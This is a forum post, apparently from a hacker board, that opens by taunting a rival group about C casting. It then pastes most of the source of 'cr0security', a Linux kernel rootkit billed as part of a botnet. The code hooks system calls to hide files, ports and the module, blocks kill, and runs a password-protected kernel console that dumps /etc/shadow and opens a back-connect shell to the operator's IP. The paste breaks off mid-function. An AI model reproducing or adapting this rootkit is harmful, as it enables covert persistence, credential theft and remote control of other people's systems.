"USE CASTING IN YOUR C CODE BITCH"

05-10-2012, 05:52 AM (This post was last modified: 08-06-2012 12:52 AM by garfield.)
Post: #1
garfield Offline

"kecoak, arrogant in the past, now and forever are u sure there will never be
someone better? do u know my real nick do u know my real name? no !"
some ppl think they're very good let me teach them basic c
it's about casting
check this code:
sys_call_table[__NR_unlink] = o_unlink;

meanwhile you've declared the prototype as
asmlinkage int (*o_unlink)(const char __user *);

are u sure it's int????



how to use casting in c ??? here if you're unsure what should be the ret val

=======

use this trick:

kill_asli = (void *) (proto_sys_call[__NR_kill]);


====

c0mp4r3 your c0d3s

cr0security.h
===
/*
* cr0security's rootkit header file
* © Copyright by Cr0security All Rights Reserved
* http://www.cr0security.com
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#ifndef _cr_H_
#define _cr_H_
/*cr_PID will be replaced by configure_lkm.pl */
#define cr0security
#define cr_PID 16000
#define our_dmesg_path "/var/log/dmesg"
#define cr_PROC "cr0security"
#define GETOPT_LACK_VALIDATION_PATH "/home/ev1lut10n/Desktop/cr_lkm/"

#define cr_PORT "7777"
#define cr_PORT_HEX "1E61"

#define cr_backconnect_PORT "7778"
#define cr_backconnect_PORT_HEX "1E62"


#define int_cr_kern_port 3737
#define cr_kern_PORT_HEX "e99"
#define string_cr_kern_port "3737"


#define END {set_fs(old_fs);}
#define KERN {old_fs=get_fs(); set_fs(KERNEL_DS);}
#define TRUE 1
#define FALSE 0
#define PROC_NET_TCP "/proc/net/tcp"
#define the_pass "password:"
#define myprocessor "/home/ev1lut10n/Desktop/cr_lkm/cr0securityd"
/*0xc05d2180 will be replaced by configure_lkm.pl */
unsigned long *proto_sys_call = (unsigned long *) 0xc05d2180;
unsigned long *invalid = (unsigned long *) 0xdeadbeef;
typedef int boolean;
size_t Length,Length2,Length3,Length4,Length5,Length6;
const char __user *buf_modified;
const char password[6] = "cr0sec";
const char null_terminate[5] = "\0x00";
char *mypassword;
char *tricky;
struct socket;
struct sockaddr;
struct sockaddr_in;
typedef int cr0;
typedef struct socket *cr0sock;
cr0sock server_sock,master_sock,mys0ck;
static cr0 result,panjang,total_pass,char_array;
static char cr0_buffer[980];
char *sockbuffer;
char *sockbuffer_cmd;
char *sockbuffer_menu_rootkit;
char *cmd_buffer;
char *clean_buffer;
char *envp[3];
char *two_last;
long r1m;
mm_segment_t old_fs;
static char valid_char[16] = {'b','c','s','e','x','i','t','h','d','w','o','p','r','1','a','l'};
static char *log_path = "/bin/dat";
//static struct task_struct *tcpd_thread;
char* cr_motd = "\n========================================="
"\nWelcome to Cr0security TCPD Console"
"\n=========================================="
"\navailable commands:\n"
"bcs - shd - who - psa - prt - help - exit\n"
"description:"
"\nbcs - back connect to your current ip via port 7778 (setup netcat to listen on 7778)"
"\nshd - seed command : view /etc/shadow"
"\npsa - seed command : ps aux | tail"
"\nwho - seed command : show who is logged on"
"\nprt - print your command's result"
"\nhelp - print this help"
"\nexit - exit this console"
"\nconsole > ";
char* cr_console = "\nconsole > ";
char* cr_failed_epic = "\nWrong password ! Access Denied\n";
static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr);
/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last);
*/
static int crdaemon(cr0sock master_sock,struct sockaddr_in master_addr);
static inline char *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode);
static inline size_t cr_send(struct socket *sock, const char *Buffer, size_t Length);
static inline ssize_t cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3);
char *log_path_buf3;
struct file *ev1l_proc,*ev1l_proc_net_tcp;
char *incoming_data;
char *successfull_msg = "Command has been executed successfully, to print the result type 'prt'\n";
char *failure = "Failed to execute your command !\n";
char hasil_konversi[10];
char predict_buffer[70];
char got_real_bufer[71];
cr0 status,konter,bit_mesin,nilai_kembali, bind, listen,cr0_data_size,__cr0_accept,____cr0_accept,ev1lmode,gmon_ops_return,i,j,executed,log_path_length;
char *tmp,*kern_heap;
cr0 *pointer_berupa_integer;
u_char *tmpbuf;
cr0 should_i_disable_sys_kill = 1;
cr0 sockbuf2_length,sockbuf1_length;
boolean found,cr0_stat,end_of_proc_net_tcp,already,validchar;
char *cr0_heap,*cr0_argumen,*str2;
cr0 how_much,len2,panjang_fake_net,panjang_fake_net_hex,panjang_dmesg_buffer,konter,rename_konter,konter2=0,totheap=0;
static cr0 dmesg_size = 256;
struct file *ev1l_dmesg,*raidon;
void *dmesg_buffer,*kmalloc_buffer,*k_m_a_l_l_o_c__b_u_f_f_e_r,*vmalloc_buffer,*unknown_buffer;
char *rkmalloc_buffer;
void *k_m_a_l_l_o_c__b_u_f_f_e_r;
boolean do_fake,do_fake_hex,rename_found;
unsigned long *retback_val;
char *file_buf,*lemme_lemme_maho,*rename_oldname;
static char *fake_net,*fake_net_hex;
/*msghdr for sock_rcvmsg and sock_sendmsg*/
typedef struct msghdr h4x0rmsg;
static inline h4x0rmsg crfillmsgbuffer(h4x0rmsg msgx);
struct iovec iov;
/*ksocket header taken from ksocket made by @song.xian-guang@hotmail.com*/
typedef struct socket *ksocket_t;
inline char *inet_ntoa(struct in_addr *in);
inline ksocket_t kaccept(ksocket_t socket, struct sockaddr *address, cr0 *address_len);
/*eof ksocket*/
boolean letmein;
size_t orig_len;
char *master_ip;
char *tmpbufx;
char *tmpcharbuf;
char *p;
static inline char* crtruncate(const char* str,cr0 len);
static inline char* replace_string(char *full_str,char *old_str, char *new_str);
static inline char *crinst(cr0 nomer);
static inline char *crflp_open(char *thecmd);
inline unsigned long *cr0repop(void *cr0_argumen);
static char cmd_pawned_cmd[11][7] = {{"pgrep"},{"ps"},{"pstree"},{"pmap"},{"grep"},{"lsof"},{"top"},{"ls"},{"dir"},{"kstat"},{"stat"}};
static char hijacked_syscall[6][12] = {{"sys_kill"},{"sys_write"},{"sys_unlink"},{"sys_unlinkat"},{"sys_open"},{"sys_rename"}};
static char forbidden_files_to_read[7][16] = {{"cr0security"},{"linux_"},{"exploit"},{"Makefile"},{"configure_lkm.pl"},{"install.pl"},{"/dev/kmem"}};
asmlinkage long (*chdir_asli)(const char __user *filename);
asmlinkage long (*rmdir_asli)(const char __user *pathname);
asmlinkage long (*rename_asli)(const char __user *oldname,const char __user *newname);
asmlinkage long (*kill_asli)(cr0 pid, cr0 sig);
asmlinkage long (*write_asli)(unsigned int fd, const char __user *buf,size_t count);
asmlinkage long (*open_asli)(const char __user *filename,cr0 flags, cr0 mode);
asmlinkage long (*unlink_asli)(const char __user *pathname);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
asmlinkage long (*unlinkat_asli)(cr0 dfd, const char __user * pathname, cr0 flag);
#endif
#endif /*#ifndef _cr_H_*/

=============


cr0security.c

==========
/*
* cr0security kernel space rootkit version 1.0
* © Copyright by Cr0security All Rights Reserved
* http://www.cr0security.com
*
* this rootkit just a module of current botnet development (cr0security's botnet)
* features:
* - kernel space daemon :
* ~ check who's on the box remotely
* ~ view /etc/shadow remotely
* ~ on demand back connect
* ~ checking process remotely
* - hiding files and directory
* - hiding from netstat
* - anti kill process
* - prevent open, rm, rmmod, fake view
* - hiding module
* - kernel space keylogger
* Tested on :
* - linux 2.6.18-274.12.1.el5 - SMP - x86_64 (CentOS)
* - linux 2.6.18-238.19.1.el5PAE - SMP - i686 (CentOS)
* - linux 2.6.32-279.2.1.el6.i686 (CentOS)
* - linux-3.3-rc6 - i686 (Debian)
* - linux-2.6.35-22-generic - i686 (Debian)
* - linux-2.6.27.1 - i686 (Debian)
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include <linux/highmem.h>
#include <linux/delay.h>
#include <linux/syscalls.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/version.h>
#ifdef CONFIG_SMP
#if(LINUX_VERSION_CODE < KERNEL_VERSION(3,0,0))
#include <linux/smp_lock.h>
#endif
#endif
#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,33))
#include <generated/autoconf.h>
#else
#include <linux/autoconf.h>
#endif
#include <linux/sched.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <linux/types.h>
#include <linux/fcntl.h>
#include <net/sock.h>
#include <linux/in.h>
#include <linux/kthread.h>
#include <linux/vmalloc.h>
#include <linux/ctype.h>
#include "cr0security.h"

static inline void cr0security cr_sendmsg(cr0sock master_sock,char *msg_to_send,char *alternate_msg)
{
cr0 filpo = 0;

KERN
if (strstr(msg_to_send,"cr0sec")) {
log_path_buf3 = kmalloc(1012,GFP_KERNEL);
log_path_buf3 = crflp_open(unknown_buffer);
sockbuffer = kmalloc(1012,GFP_KERNEL);
Length6 = sprintf(sockbuffer, log_path_buf3);
}
else {
sockbuffer = kmalloc(300,GFP_KERNEL);
if (executed == 0)
Length6 = sprintf(sockbuffer,msg_to_send);
else
Length6 = sprintf(sockbuffer,alternate_msg);
}
cr_send(master_sock,sockbuffer,Length6);
kfree(sockbuffer);
if (filpo == 1)
kfree(log_path_buf3);
END
}

static inline char *crinst(cr0 nomer)
{
sprintf(hasil_konversi,"%d",nomer);
return hasil_konversi;
}

inline unsigned long cr0security *cr_repop(void *cr0_argumen)
{
cr0_heap = kmalloc(256,GFP_KERNEL);
KERN
r1m = copy_from_user(cr0_heap,cr0_argumen,255);
END
if ((strstr(cr0_heap,"cr0security")) || (strstr(cr0_heap,"sbin")))
cr0_stat = TRUE;
else
cr0_stat = FALSE;
kfree(cr0_heap);
if (cr0_stat == TRUE)
retback_val = (unsigned long *) (-ENOENT);
return retback_val;
}

static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr)
{
cr0 panjang_cr_failed_epic = strlen(cr_failed_epic);

KERN
sockbuffer = kmalloc((panjang_cr_failed_epic+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_failed_epic);
cr_send(master_sock,sockbuffer,Length4);
kfree(sockbuffer);
END
return 0;
}

static inline void cr0security userspace_elf(char *cmd)
{
cr0 ret = 0;
char *argv[] = {myprocessor,cmd,NULL};
char *envp[] = {"HOME=/","PATH=/sbin:/usr/sbin:/bin:/usr/bin",0};

KERN
ret = call_usermodehelper(myprocessor, argv,envp, 0);
END
}

static inline cr0 cr0security umhbcs(char *ipx)
{
cr0 ret = 0;
char *argv[] = {myprocessor,"bcs",ipx, NULL};
char *envp[] = {"HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", 0};

KERN
ret = call_usermodehelper(myprocessor, argv, envp, 0);
END
return ret;
}

static cr0 cr0security crdaemon(cr0sock master_sock,struct sockaddr_in master_addr)
{
cr0 panjang_cr_console = strlen(cr_console);
cr0 cr0_executed = 0;
cr0 executed = 1;
cr0 panjang_cr_motd = strlen(cr_motd);

repeated_oops:
switch (cr0_executed) {
case 0:
sockbuffer = kmalloc((panjang_cr_motd+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_motd);
KERN
cr_send(master_sock,sockbuffer,Length4);
END
kfree(sockbuffer);
break;
case 1:
sockbuffer = kmalloc((panjang_cr_console+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_console);
KERN
cr_send(master_sock,sockbuffer,Length4);
END
kfree(sockbuffer);
break;
case 2:
return -1;
break;
}
while (1) {
char cmd[70] = "";
Length5 = 0;
sockbuffer_cmd = kmalloc(70,GFP_KERNEL);
KERN
Length5 = cr_recvmsg(master_sock, sockbuffer_cmd, sizeof(sockbuffer_cmd));
END
if (Length5 > 0) {
KERN
snprintf(predict_buffer,70,"%s",sockbuffer_cmd);
for (i = 0;i < 68;i++) {
validchar = 0;
for (j = 0;j < 66;j++) {
if((int)predict_buffer[i] == (int)valid_char[j])
validchar = 1;
}
if(validchar == 1)
cmd[i] = predict_buffer[i];
}
END
}
kfree(sockbuffer_cmd);
if ((strlen(cmd) > 2)) {
if ((strcmp(cmd,"exit") == 0) || (strstr(cmd,"ex")))
cr0_executed = 2;
else {
executed = 0;
printk("\ngot cmd : [%s]\n",cmd);
if((strcmp(cmd,"shd") == 0) || (strstr(cmd,"sh"))) {
KERN
userspace_elf("shd");
cr_sendmsg(master_sock,successfull_msg,failure);
END
cr0_executed = 1;
}
else if ((strcmp(cmd,"who") == 0) || (strstr(cmd,"wh"))) {
KERN
userspace_elf("who");
cr_sendmsg(master_sock,successfull_msg,failure);
END
cr0_executed = 1;
}
else if ((strcmp(cmd,"psa") == 0) || (strstr(cmd,"ps"))) {
userspace_elf("psa");
cr_sendmsg(master_sock,successfull_msg,failure);
END
cr0_executed = 1;
}
else if ((strstr(cmd,"pr")) || (strcmp(cmd,"prt") == 0)) {
KERN
cr_sendmsg(master_sock,"cr0security","cr0security");
END
cr0_executed = 1;
}
else if ((strcmp(cmd,"bcs") == 0) || (strstr(cmd,"bc"))) {
master_ip = kmalloc(16,GFP_KERNEL);
KERN
master_ip = inet_ntoa(&master_addr.sin_addr);
executed = umhbcs(master_ip);
sockbuffer = kmalloc(100,GFP_KERNEL);
Length6 = sprintf(sockbuffer, "\nback connect to [%s]\n",master_ip);
cr_send(master_sock,sockbuffer,Length6);
kfree(sockbuffer);
kfree(master_ip);
END
cr0_executed = 1;
}
else {
KERN
sockbuffer = kmalloc((panjang_cr_motd+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_motd);
cr_send(master_sock,sockbuffer,Length4);
kfree(sockbuffer);
END
cr0_executed = 1;
}
}
}
goto repeated_oops;
}
return 0;
}

static inline char cr0security *crflp_open(char *unknown_buffer)
{
char buf[1012];
cr0 konter = 0;

char_array = 0;
unknown_buffer = kmalloc(1012, GFP_KERNEL);
tmpcharbuf = kmalloc(1, GFP_KERNEL);
KERN
raidon = filp_open(log_path, O_RDONLY, 0);
sprintf(unknown_buffer, "\n");
if(IS_ERR(raidon))
sprintf(unknown_buffer,"\nfailed to execute your command sorry\n");
else {
memset(buf, 0x0, 1012);
p = buf;
while ((vfs_read(raidon, p + char_array, 1, &raidon->f_pos) == 1) && (konter < 1007)) {
konter++;
if (p[char_array] == '\n' || char_array == 255)
sprintf(tmpcharbuf, "%c", p[char_array]);
else {
sprintf(tmpcharbuf, "%c", p[char_array]);
char_array = 0;
}
strcat(unknown_buffer, tmpcharbuf);
memset(buf, 0x0, 1012);
char_array++;
}
}
filp_close(raidon,NULL);
END
kfree(tmpcharbuf);
return unknown_buffer;
kfree(unknown_buffer);
}

static inline void cr0security cr(void)
{
unsigned long value;

asm volatile("mov %%cr0,%0" : "=r" (value));
if (value & 0x10000) {
value &= ~0x00010000;
asm volatile("mov %0,%%cr0": : "r" (value));
}
else
write_cr0 (read_cr0 () | 0x10000);
}

static cr0 cr0security init_cr_this_mod(void *arg)
{
cr0sock server_sock,master_sock;
struct sockaddr_in server_addr;
struct sockaddr_in master_addr;
cr0 my_sockaddr_len, master_sockaddr_len;

repeat_socket:
already = FALSE;
allow_signal(SIGKILL);
master_sock = NULL;
server_sock = NULL;
KERN
memset(&master_addr,0,sizeof(master_addr));
memset(&server_addr,0,sizeof(server_addr));
server_addr.sin_family = PF_INET;
server_addr.sin_port = htons(int_cr_kern_port);
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
my_sockaddr_len = sizeof(struct sockaddr_in);
master_sockaddr_len = sizeof(struct sockaddr_in);
result = sock_create(PF_INET, SOCK_STREAM, 0, &server_sock);
if(result < 0)
return -1;
if (server_sock==NULL)
return -1;
bind = server_sock->ops->bind(server_sock, (struct sockaddr *) &server_addr, my_sockaddr_len);
if (bind < 0)
return -1;
listen = server_sock->ops->listen(server_sock,SOMAXCONN);
if (listen < 0)
return -1;
master_sock = kaccept(server_sock, (struct sockaddr *)&master_addr, &my_sockaddr_len);
if (master_sock == NULL)
return -1;
Length = sprintf(cr0_buffer, "%s",the_pass);
cr_send(master_sock, cr0_buffer, Length);
END
while ((1) && (already == FALSE)) {
sockbuffer = kmalloc(256,GFP_KERNEL);
KERN
Length2 = cr_recvmsg(master_sock, sockbuffer, sizeof(sockbuffer));
END
if (Length2 > 0) {
KERN
panjang = strlen(password) - 1;
clean_buffer = kmalloc(panjang,GFP_KERNEL);
orig_len = panjang;
clean_buffer = crtruncate(sockbuffer,panjang);
total_pass = panjang + 10;
mypassword = kmalloc(total_pass,GFP_KERNEL);
sprintf(mypassword,"%s%s%s",password,null_terminate,null_terminate);
END
if(strstr(mypassword,clean_buffer)) {
kfree(sockbuffer);
kfree(mypassword);
kfree(clean_buffer);
goto letmein;
}
else {
kfree(sockbuffer);
kfree(mypassword);
kfree(clean_buffer);
goto wrongway;
}
}
kfree(sockbuffer);
}
wrongway:
resumer(master_sock,master_addr);
if (master_sock != NULL)
sock_release(master_sock);
if (server_sock != NULL)
sock_release(server_sock);
goto repeat_socket;
letmein:
gmon_ops_return = crdaemon(master_sock,master_addr);
if (master_sock != NULL)
sock_release(master_sock);
if (server_sock != NULL)
sock_release(server_sock);
goto repeat_socket;
//do {} while(!kthread_should_stop());
return 0;
}

/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last)
{
char *ret_string_val;
cr0 i;
cr0 sisha;
printk("\nexecuting cr0_substring\n");
ret_string_val=(char*)kmalloc((cr0)(length_from_last),GFP_KERNEL);
sisha=len_original_string-length_from_last;
for (i=len_original_string;i>sisha;i--) {
printk("\ngot i : [%d]\n",i);
printk("\ngot char val: %c\n",str[i]);
}
i--;
printk("\ngot i : [%d]\n",i);
printk("\ngot char val: %c\n",str[i]);
return (char*)(ret_string_val);
}
*/

static inline char* cr0security crtruncate(const char* str,cr0 len)
{
char *str2;

str2 = kmalloc((cr0)(len),GFP_KERNEL);
if (strlen(str) == 0)
return (char*)(str);
else {
snprintf(str2,len,"%s",str);
return (char*)(str2);
}
kfree(str2);
}

static inline char* cr0security replace_string(char *full_str,char *old_str, char *new_str)
{
static char buffer[4096];
char *p;

if(!(p = strstr(full_str, old_str)))
return full_str;
strncpy(buffer, full_str, p-full_str);
buffer[p-full_str] = '\0';
sprintf(buffer+(p-full_str), "%s%s", new_str, p+strlen(old_str));
return buffer;
}

static inline h4x0rmsg cr0security crfillmsgbuffer(h4x0rmsg msgx)
{
KERN
msgx.msg_name = 0;
msgx.msg_namelen = 0;
msgx.msg_iov = &iov;
msgx.msg_iovlen = 1;
msgx.msg_control = NULL;
msgx.msg_controllen = 0;
msgx.msg_flags = MSG_NOSIGNAL;
END
return msgx;
}

static inline size_t cr0security cr_send(cr0sock master_sock, const char *Buffer, size_t Length)
{
h4x0rmsg msg;

KERN
msg = (h4x0rmsg) (crfillmsgbuffer(msg));
iov.iov_base = (char*) Buffer;
iov.iov_len = Length;
len2 = sock_sendmsg(master_sock,&msg,(size_t)(Length));
END
return len2;
}

static inline ssize_t cr0security cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3)
{
h4x0rmsg msg;
ssize_t retme;

KERN
msg = (h4x0rmsg) crfillmsgbuffer(msg);
iov.iov_base = (char*) cr0_buffer;
iov.iov_len = Length3;
retme = sock_recvmsg(master_sock, &msg, Length3, 0);
END
return retme;
}

/*
brute forcing method to find sys_call_table ( Sorry, not for SMP )
taken from http://www.gadgetweb.de/linux/40-how-to-...stems.html
* note for good
ideal method should be, but the code below is just brute forcing
- get idtr using sidt
- extract the idt address from idtr
- get the address of system_call from 0x80th entry of the idt
- search system_call for our code fingerprinting
- got sys_call_table addr
*/

unsigned long **find_sys_call_table(void)
{
unsigned long ptr;
unsigned long **sctable;

sctable = NULL;
ptr = 0;
#ifdef CONFIG_SMP
goto not_for_smp;
#else
for (ptr = (unsigned long)&_unlock_kernel; ptr < (unsigned long)&loops_per_jiffy;ptr += sizeof(void *)) {
unsigned long *p;
p = (unsigned long *)ptr;
if (p[__NR_close] == (unsigned long) sys_close) {
sctable = (unsigned long **)p;
return &sctable[0];
}
}
#endif
not_for_smp:
return NULL;
}

/*kaccept taken from http://sourceforge.net/projects/ksocket/
* ksocket module by
* @song.xian-guang@hotmail.com (MSN Accounts)
* @2007-2008, China
*/

inline ksocket_t kaccept(ksocket_t socket, struct sockaddr *address, cr0 *address_len)
{
struct socket *sk;
struct socket *new_sk = NULL;
cr0 ret;

sk = (struct socket *)socket;
KERN
ret = sock_create(sk->sk->sk_family, sk->type, sk->sk->sk_protocol, &new_sk);
END
if (ret < 0)
return NULL;
if (!new_sk)
return NULL;
KERN
new_sk->type = sk->type;
new_sk->ops = sk->ops;
ret = sk->ops->accept(sk, new_sk, 0);
END
if (ret < 0)
goto error_kaccept;
if (address) {
KERN
ret = new_sk->ops->getname(new_sk, address, address_len, 2);
END
if (ret < 0)
goto error_kaccept;
}
return new_sk;
error_kaccept:
sock_release(new_sk);
return NULL;
}
/*eof kaccept*/

/*inet_ntoa function taken from ksocket by @song.xian-guang@hotmail.com */
inline char *inet_ntoa(struct in_addr *in)
{
char* str_ip = NULL;
u_int32_t int_ip = 0;

KERN
str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL);
if (!str_ip)
return NULL;
else
memset(str_ip, 0, 16);
int_ip = in->s_addr;
sprintf(str_ip, "%d.%d.%d.%d", (int_ip ) & 0xFF,(int_ip >> 8 ) & 0xFF,(int_ip >> 16) & 0xFF,(int_ip >> 24) & 0xFF);
return str_ip;
kfree(str_ip);
END
}
/*eof ksocket's inet_ntoa*/

inline static asmlinkage unsigned long cr0security *cr_open(const char __user *filename,cr0 flags, cr0 mode)
{
found=FALSE;
tmpbuf = kmalloc(256,GFP_KERNEL);
KERN
r1m = copy_from_user(tmpbuf,filename,255);
END
for (konter=0;konter < 7;konter++) {
if (strstr(tmpbuf,forbidden_files_to_read[konter]))
found=TRUE;
}
if (found == TRUE)
return (unsigned long *) (-ENOENT);
else
return (unsigned long *) (open_asli) (filename,flags,mode);
kfree(tmpbuf);
}

inline static asmlinkage unsigned long cr0security *cr_chdir(const char __user *filename)
{
KERN
cr0_stat = FALSE;
cr_repop((void *)filename);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (chdir_asli) (filename);
END
return retback_val;
}

inline static asmlinkage unsigned long cr0security *cr_rmdir(const char __user *pathname)
{
cr0_stat = FALSE;
cr_repop((void *)pathname);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (rmdir_asli) (pathname);
return retback_val;
}

inline static asmlinkage unsigned long cr0security *cr_rename(const char __user *oldname,const char __user *newname)
{
rename_found = FALSE;
rename_oldname = kmalloc(256,GFP_KERNEL);
KERN
r1m = copy_from_user(rename_oldname,oldname,255);
END
if ((strstr(rename_oldname,"cr0security")) || (strstr(rename_oldname,"sbin")))
rename_found = TRUE;
else {
for (rename_konter = 0;rename_konter < 10;rename_konter++) {
if (strstr(rename_oldname,forbidden_files_to_read[rename_konter]))
rename_found = TRUE;
}
}
if (rename_found == TRUE)
return (unsigned long *) (-ENOENT);
else
return (unsigned long *) (rename_asli) (oldname,newname);
kfree(rename_oldname);
}

inline static asmlinkage unsigned long cr0security *cr_write(unsigned int fd, const char __user *buf,size_t count)
{
status=7777;
do_fake = FALSE;
if ((strstr(current->comm,"netstat")) || (strstr(current->comm,"|")) || (strstr(current->comm,"stat")) || (strstr(current->comm,"ss")) || (strstr(current->comm,"ip
")) || (strstr(current->comm,"cat")) || (strstr(current->comm,"pic")) || (strstr(current->comm,"more")) || (strstr(current->comm,"head"))) {
buf_modified = kmalloc(count,GFP_KERNEL);
kern_heap = kmalloc(count,GFP_KERNEL);
KERN
r1m = copy_from_user(kern_heap,buf,count);
END
if (strstr(kern_heap,cr_PORT)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,1);
END
}
else if (strstr(kern_heap,string_cr_kern_port)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,2);
END
}
else if (strstr(kern_heap,cr_backconnect_PORT)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,6);
END
}
else if (strstr(kern_heap,cr_backconnect_PORT_HEX)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,5);
END
}
else if (strstr(kern_heap,cr_PORT_HEX)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,3);
END
}
else if (strstr(kern_heap,cr_kern_PORT_HEX)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,4);
END
}
kfree(kern_heap);
if (do_fake == TRUE) {
count = (size_t) panjang_fake_net;
return (unsigned long *) (write_asli) (fd, buf, count);
}
else if (do_fake_hex == TRUE) {
count = (size_t) panjang_fake_net_hex;
return (unsigned long *) (write_asli) (fd,buf,count);
}
else
return (unsigned long *) (write_asli) (fd, buf, count);
}
else if (strstr(current->comm,"dmesg")) {
KERN
ev1l_dmesg = filp_open(our_dmesg_path,O_RDONLY,0);
END
if (IS_ERR(ev1l_dmesg))
goto close;
else {
dmesg_buffer = kmalloc(dmesg_size,GFP_KERNEL);
KERN
ev1l_dmesg->f_op->read(ev1l_dmesg,dmesg_buffer,dmesg_size, &ev1l_dmesg->f_pos);
r1m = copy_to_user((void*)buf,dmesg_buffer,dmesg_size);
END
count = dmesg_size;
kfree(dmesg_buffer);
}
close:
filp_close(ev1l_dmesg,NULL);
return (unsigned long *) (write_asli) (fd,buf,count);
}
else {
if ((strstr(buf,cr_PROC))) {
char *kbuf = kmalloc(count,GFP_KERNEL);
KERN
r1m = copy_from_user(kbuf,buf,count);
END
for (konter = 0;konter < 11;konter++) {
KERN
if (strstr(current->comm,cmd_pawned_cmd[konter])) {
if (strstr(kbuf,cr_PROC))
status = 0;
}
END
crinst(cr_PID);
KERN
if ((strstr(current->comm,"pmap")) && (strstr(current->comm,hasil_konversi)) && (strstr(current->comm,"stat")))
status = 2;
END
if (konter2 < 7) {
if (strstr(kbuf,hijacked_syscall[konter2]))
status = 0;
}
}
kfree(kbuf);
}
switch (status) {
case 0:
k_m_a_l_l_o_c__b_u_f_f_e_r = kmalloc(256,GFP_KERNEL);
memset(k_m_a_l_l_o_c__b_u_f_f_e_r, 0,255);
KERN
r1m = copy_to_user((void *)buf,k_m_a_l_l_o_c__b_u_f_f_e_r,255);
END
kfree(k_m_a_l_l_o_c__b_u_f_f_e_r);
retback_val = (unsigned long *) (write_asli) (fd,buf,count);
case 2:
retback_val = (unsigned long *) (-ESRCH);
break;
case 7777:
retback_val = (unsigned long *) (write_asli) (fd, buf, count);
}
return retback_val;
}
}

static inline char cr0security *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode)
{
if ((ev1lmode==1) || (ev1lmode==2) || (ev1lmode==6)) {
panjang_fake_net = strlen(kern_heap);
fake_net = vmalloc(panjang_fake_net);
vmalloc_buffer = vmalloc(panjang_fake_net);
}
else {
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = vmalloc(panjang_fake_net_hex);
vmalloc_buffer = vmalloc(panjang_fake_net_hex);
}
switch (ev1lmode) {
case 1:
panjang_fake_net = strlen(kern_heap);
fake_net = replace_string(kern_heap,cr_PORT,"* ");
break;
case 2:
panjang_fake_net = strlen(kern_heap);
fake_net = replace_string(kern_heap,string_cr_kern_port,"* ");
break;
case 3:
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = replace_string(kern_heap,cr_PORT_HEX,"0000");
break;
case 4:
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = replace_string(kern_heap,cr_kern_PORT_HEX,"0000");
break;
case 5:
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = replace_string(kern_heap,cr_backconnect_PORT_HEX,"0000");
break;
case 6:
panjang_fake_net = strlen(kern_heap);
fake_net = replace_string(kern_heap,cr_backconnect_PORT,"* ");
break;
}
KERN
if ((ev1lmode == 1) || (ev1lmode == 2) || (ev1lmode == 6)) {
memcpy(vmalloc_buffer,fake_net,panjang_fake_net);
r1m = copy_to_user((void*)buf,vmalloc_buffer,panjang_fake_net);
vfree(fake_net);
}
else {
memcpy(vmalloc_buffer,fake_net_hex,panjang_fake_net_hex);
r1m = copy_to_user((void*)buf,vmalloc_buffer,panjang_fake_net_hex);
vfree(fake_net_hex);
}
END
vfree(vmalloc_buffer);
return (char*)buf;
}

inline static asmlinkage unsigned long cr0security *cr_unlink(const char __user *pathname)
{
cr0_stat = FALSE;
cr_repop((void *)pathname);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (*unlink_asli)(pathname);
return retback_val;
}

#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
inline static asmlinkage unsigned long cr0security *cr_unlinkat(cr0 dfd, const char __user * pathname, cr0 flag)
{
cr0_stat = FALSE;
cr_repop((void *)pathname);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (*unlinkat_asli)(dfd,pathname,flag);
return retback_val;
}
#endif

inline static asmlinkage unsigned long cr0security *cr_kill(cr0 pid, cr0 sig)
{
if ((should_i_disable_sys_kill > 0)) {
crinst(pid);
